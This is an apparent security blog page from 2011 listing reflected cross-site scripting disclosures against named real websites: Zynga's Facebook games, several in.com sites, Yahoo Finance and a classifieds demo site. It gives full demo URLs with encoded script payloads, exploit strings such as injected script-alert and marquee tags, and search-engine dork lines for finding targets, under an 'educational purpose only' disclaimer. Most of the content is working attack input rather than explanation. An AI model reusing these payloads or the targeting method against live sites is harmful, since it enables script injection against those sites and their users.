Training on XSS for newbies

Leave a comment


click here to download the file: XSS_PPT

XSS and URL redirection Bugs in Zynga Games(facebook third party applications)

Leave a comment


        _______  ________________ __    _____________
_______ \   _  \ \   _  \______  \  | _/_   \______  \         __  _  __
\_  __ \/  /_\  \/  /_\  \  /    /  |/ /|   |   /    /  ______ \ \/ \/ /
 |  | \/\  \_/   \  \_/   \/    /|    < |   |  /    /  /_____/  \     /
 |__|    \_____  /\_____  /____/ |__|_ \|___| /____/             \/\_/
               \/       \/            \/

VENDOR :  apps.facebook.com****[]***
        1) POKER
        2) Farmville
        3) Vampireville
        4) Fishville 
        5) Cafeworld
        6) Petville
Author: r007k17-w
Email:  n4gb07@gmail.com
DISCLAIMER:
Contents of this is for EDUCATIONAL PURPOSE ONLY....
Author is not responsible for misuse of this.
Snapshots:
   

This slideshow requires JavaScript.

1) POKER http://shadowrootkit.files.wordpress.com/2011/08/zynga_poker.png http://shadowrootkit.files.wordpress.com/2011/08/zynga_poker1.png 2) FISHVILLE http://shadowrootkit.files.wordpress.com/2011/08/zynga_fishville.png http://shadowrootkit.files.wordpress.com/2011/08/zynga_fishville1.png 3) VAMPIREVILLE http://shadowrootkit.files.wordpress.com/2011/08/zynga_vampireville.png 4) CAFEWORLD http://shadowrootkit.files.wordpress.com/2011/08/zynga_cafeworld.png 5)PETVILLE http://shadowrootkit.files.wordpress.com/2011/08/zynga_petville.png

Various Indian Sites Cross Site Scripting

Leave a comment


# Exploit Title: *.in.com XSS vulnerability
# Vendor: various
# Date: 6th july,2011
# Author: r007k17 a.k.a Raghavendra Karthik D
# link: http://shadowrootkit.wordpress.com/
# Google Dork:   © Copyright 2010, Business.in.com
************************************************************

{DEMO} :

http://business.in.com/search.php?searchtext=%22%3E%3Cscript%3Ealert%28/s/%29%3C/script%3E

EXPLOIT: "><script>alert(/s/)</script>

{DEMO} :

http://cricketnext.in.com/search/searchnews.php?search_value=%22%3E%3Cscript%3Ealert%28%2Fs%2F%29%3C%2Fscript%3E

EXPLOIT: "><script>alert(/s/)</script>

{DEMO} :

http://hooked-in.com/waterbodies/search?q=%22%3E%3Cscript%3Ealert%28%2Fr007k17%2F%29%3C%2Fscript%3E

EXPLOIT: "><script>alert(/r007k17/)</script>

 Reflected XSS in  connect.in.com
 Inject EXPLOIT below in search field in http://connect.in.com
observe a pop-up saying r007k17

{DEMO} :   http://connect.in.com

EXPLOIT: "><script>alert(/r007k17/)</script>

************************************************************
 sp3c14l Thanks to s1d3^effects and my friends@!3.14--
************************************************************

Yahoo finance(Alexa 4th ranked) Cross site scripting vulnerability

Leave a comment


Yahoo Finance, famous site ranked 4 by Alexa had XSS vulnerabilty in GET QUOTES
in search field.

%+         $…….#……..4………|)……..0…………\/\/       %+

                                              %+                                                                                                      %+
%++++++++++++++++++++++++++++++++++++++++
#Exploit Title :Yahoo finance reflected XSS vulnerability
# Vendor: www.finance.yahoo.com
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D(karthikaryabhat@gmail.com)
# Google Dork: Copyright © 2011 Yahoo! Inc
**********************************************************************************************************
BREIF DESCRIPTION
***********************************************************************************************************
Reflected XSS in yahoo finance in text field beside [GET QOTE] button.
**********************************************************************************************************
Reflected XSS Vulnerability
**********************************************************************************************************
{DEMO} : target/q?s=%22%3E%3E%3Cb%3E%3Ch1%3Eaa%3C%2Fh1%3E%3C/b%3E&ql=1
EXPLOIT: “>><marquee><h1>yahoo japan</marquee>Procedure: open the link given above. Observe the text field with a button (GET QUOTES). Inject the above “EXPLOIT” to  this text field.
you can observe an iframe created and a pop up.***********************************************************************************************************
sp3c14l Thanks to s1d3 effects and my friends@!3.14–
***********************************************************************************************************Reference: http://www.xssed.com/mirror/73490/

Classifieddemo site XSS vulnerability

Leave a comment


%+ $…….#……..4………|)……..0…………\/\/ %+

%+ %+ %++++++++++++++++++++++++++++++++++++++++

# Exploit Title: Classifieddemo site XSS vulnerability
#Vendor: http://www.classifieddemo.com
# Date: 4th july,2011 # Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D
#Google Dork: Copyright © 2011 Classified website

*********************************************************************************************************  BREIF DESCRIPTION

*****************************

Reflected XSS in search field in Classifieddemo site.

**********************************************************************************************************  XSS Vulnerability

********************************

{DEMO} : http://www.classifieddemo.com/c-BrowseClassified/q:%5C%22%3E%3Cmarquee%3E%3Ch1%3EXSSed%20By%20r007k17%3C/h1%3E%3C/marquee%3E|p:0|gal:0|typ:|/ EXPLOIT:”>XSSed By r007k17

********************************************************************************************************** sp3c14l Thanks to s1d3 effects and my friends@!3.14– **********************************************************************************************************

Follow

Get every new post delivered to your Inbox.